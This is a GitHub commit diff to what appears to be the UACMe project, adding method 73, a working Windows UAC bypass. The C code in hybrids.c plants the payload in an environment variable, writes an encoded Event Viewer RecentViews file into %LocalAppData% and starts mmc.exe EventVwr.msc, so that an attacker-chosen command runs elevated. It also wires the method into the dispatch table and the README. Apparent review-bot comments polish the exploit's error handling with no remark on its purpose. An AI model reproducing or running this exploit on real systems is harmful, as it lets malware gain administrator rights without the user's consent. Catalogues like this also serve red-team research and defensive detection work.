
v 3.6.0
Method 73 added, see #127 for more info;
Readme updated.
hfiref0x committed Apr 29, 2022
1 parent c88d8d3 commit 06d4865
Showing 18 changed files with 1,180 additions and 100 deletions.
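--- a/README.md
+++ b/README.md
@@ -743,6 +743,16 @@ First parameter is number of method to use, second is optional command (executab
 * Fixed in: unfixed :see_no_evil:
 * How: -
 * Code status: added in v3.5.9
+73. Author: orange_8361 and antonioCoco
+* Type: Shell API
+* Method: .NET deserialization
+* Target(s): \system32\mmc.exe EventVwr.msc
+* Component(s): Attacker defined
+* Implementation: ucmDotNetSerialMethod
+* Works from: Windows 7 RTM (7600)
+* Fixed in: unfixed :see_no_evil:
+* How: -
+* Code status: added in v3.6.0
 
 </details>
 
@@ -850,6 +860,7 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
 * UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
 * Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
 * MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
+* UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944
 
 # Authors
 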
Binary file modified Source/Akagi/Resource.rc
Binary file not shown.
644 changes: 641 additions & 3 deletions Source/Akagi/encresource.h

Large diffs are not rendered by default.

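--- a/Source/Akagi/global.h
+++ b/Source/Akagi/global.h
@@ -4,9 +4,9 @@
 *
 * TITLE: GLOBAL.H
 *
-* VERSION: 3.59
+* VERSION: 3.60
 *
-* DATE: 04 Feb 2022
+* DATE: 27 Apr 2022
 *
 * Common header file for the program support routines.
 *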
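--- a/Source/Akagi/methods/hybrids.c
+++ b/Source/Akagi/methods/hybrids.c
@@ -4,9 +4,9 @@
 *
 * TITLE: HYBRIDS.C
 *
-* VERSION: 3.59
+* VERSION: 3.60
 *
-* DATE: 02 Feb 2022
+* DATE: 27 Apr 2022
 *
 * Hybrid UAC bypass methods.
 *
@@ -1138,3 +1138,86 @@ NTSTATUS ucmMsdtMethod(
 
 return MethodResult;
 }
+
+/*
+* ucmDotNetSerialMethod
+*
+* Purpose:
+*
+* Bypass UAC using DotNet Deserialization for eventvwr.
+*
+*/
+NTSTATUS ucmDotNetSerialMethod(
+_In_ LPWSTR lpszPayload
+)
+{
+NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
+HANDLE hProcess = NULL;
+PVOID dataBuffer;
+DWORD dataSize;
+LPWSTR lpAppData = NULL, lpTargetPath = NULL;
+SIZE_T memIO;
+WCHAR szTarget[MAX_PATH * 2];
+
+do {
+
+//
+// Set payload as environment variable.
+//
+supSetEnvVariable(FALSE, NULL, MYSTERIOUSCUTETHING, lpszPayload);
+
+//
+// Drop RecentViews cache element to %AppData%.
+//
+if (FAILED(SHGetKnownFolderPath(&FOLDERID_LocalAppData, 0, NULL, &lpAppData)))
+break;
+
+memIO = (MAX_PATH + _strlen(lpAppData)) * sizeof(WCHAR);
+lpTargetPath = (LPWSTR)supHeapAlloc(memIO);
+if (lpTargetPath == NULL)
+break;
+
+_strcpy(lpTargetPath, lpAppData);
+_strcat(lpTargetPath, TEXT("\\Microsoft\\Event Viewer\\RecentViews"));
+
+if (g_ctx->dwBuildNumber < NT_WIN8_RTM) {
+dataBuffer = (PVOID)g_encodedRecentViewsV2;
+dataSize = sizeof(g_encodedRecentViewsV2);
+}
+else {
+dataBuffer = (PVOID)g_encodedRecentViews;
+dataSize = sizeof(g_encodedRecentViews);
+}
+
+if (!supDecodeAndWriteBufferToFile(lpTargetPath,
+(CONST PVOID)dataBuffer,
+dataSize,
+'zzzz'))
+{
+break;
+}
+
+//
+// Run eventvwr.exe as final trigger.
+//
+_strcpy(szTarget, g_ctx->szSystemDirectory);
+_strcat(szTarget, MMC_EXE);
+hProcess = supRunProcess3(szTarget, EVENTVWR_MSC, NULL, SW_SHOW);
+if (hProcess) {
+supWaitForChildProcesses(MMC_EXE, 50 * 1000);
+CloseHandle(hProcess);
+MethodResult = STATUS_SUCCESS;
+}
+
+} while (FALSE);
+
+if (lpAppData) CoTaskMemFree(lpAppData);
+if (lpTargetPath) {
+DeleteFile(lpTargetPath);
+supHeapFree(lpTargetPath);
+}
+
+supSetEnvVariable(TRUE, NULL, MYSTERIOUSCUTETHING, NULL);
+
+return MethodResult;
+}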
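Review bot: The result of `supSetEnvVariable(FALSE, ...)` at the top of the `do` block is discarded, while every later step of the same block breaks on failure; if the variable cannot be set, the method still writes the RecentViews file, launches mmc.exe, and reports STATUS_SUCCESS solely because process creation succeeded. If the helper returns BOOL like the other sup* calls here (its prototype is outside this hunk), `if (!supSetEnvVariable(FALSE, NULL, MYSTERIOUSCUTETHING, lpszPayload)) break;` keeps the error handling uniform. The header comment should also record the side effects and how they are reverted: the environment variable is cleared and the dropped file deleted on every exit path, whereas the spawned mmc.exe is only waited on for 50 seconds before cleanup runs, so the file may be removed while the child is still running.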
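--- a/Source/Akagi/methods/hybrids.h
+++ b/Source/Akagi/methods/hybrids.h
@@ -4,9 +4,9 @@
 *
 * TITLE: HYBRIDS.H
 *
-* VERSION: 3.59
+* VERSION: 3.60
 *
-* DATE: 02 Feb 2022
+* DATE: 27 Apr 2022
 *
 * Prototypes and definitions for hybrid methods.
 *
@@ -57,6 +57,9 @@ NTSTATUS ucmMsdtMethod(
 _In_ PVOID ProxyDll,
 _In_ DWORD ProxyDllSize);
 
+NTSTATUS ucmDotNetSerialMethod(
+_In_ LPWSTR lpszPayload);
+
 //
 // Post execution cleanup routines.
 //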
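--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -4,9 +4,9 @@
 *
 * TITLE: METHODS.C
 *
-* VERSION: 3.59
+* VERSION: 3.60
 *
-* DATE: 04 Feb 2022
+* DATE: 27 Apr 2022
 *
 * UAC bypass dispatch.
 *
@@ -46,6 +46,7 @@ UCM_API(MethodProtocolHijack);
 UCM_API(MethodPca);
 UCM_API(MethodCurVer);
 UCM_API(MethodMsdt);
+UCM_API(MethodDotNetSerial);
 
 ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
 UacMethodWow64Logger,
@@ -133,7 +134,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
 { MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
 { MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
 { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
-{ MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }
+{ MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },
+{ MethodDotNetSerial, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }
 };
 
 /*
@@ -755,3 +757,17 @@ UCM_API(MethodMsdt)
 Parameter->PayloadCode,
 Parameter->PayloadSize);
 }
+
+UCM_API(MethodDotNetSerial)
+{
+LPWSTR lpszPayload = NULL;
+
+UNREFERENCED_PARAMETER(Parameter);
+
+if (g_ctx->OptionalParameterLength == 0)
+lpszPayload = g_ctx->szDefaultPayload;
+else
+lpszPayload = g_ctx->szOptionalParameter;
+
+return ucmDotNetSerialMethod(lpszPayload);
+}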
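Review bot: `MethodDotNetSerial` deliberately ignores `Parameter` and takes its command line from `g_ctx`, which matches the `PAYLOAD_ID_NONE` dispatch entry added in the table above but is left unexplained, unlike the neighbouring `MethodMsdt` that forwards `Parameter->PayloadCode`. A one-line comment above the `if`, such as `// PAYLOAD_ID_NONE: no embedded payload, use the optional parameter or fall back to the default one.`, would record the reason for `UNREFERENCED_PARAMETER`. The two-branch assignment can also be written as a single initialised declaration, `LPWSTR lpszPayload = (g_ctx->OptionalParameterLength == 0) ? g_ctx->szDefaultPayload : g_ctx->szOptionalParameter;`, dropping the `= NULL` placeholder.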
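--- a/Source/Akagi/methods/methods.h
+++ b/Source/Akagi/methods/methods.h
@@ -4,9 +4,9 @@
 *
 * TITLE: METHODS.H
 *
-* VERSION: 3.59
+* VERSION: 3.60
 *
-* DATE: 04 Feb 2022
+* DATE: 27 Apr 2022
 *
 * Prototypes and definitions for UAC bypass methods table.
 *
@@ -92,6 +92,7 @@ typedef enum _UCM_METHOD {
 UacMethodCurVer, //+
 UacMethodNICPoison2, //+
 UacMethodMsdt, //+
+UacMethodDotNetSerial, //+
 UacMethodMax,
 UacMethodInvalid = 0xabcdef
 } UCM_METHOD;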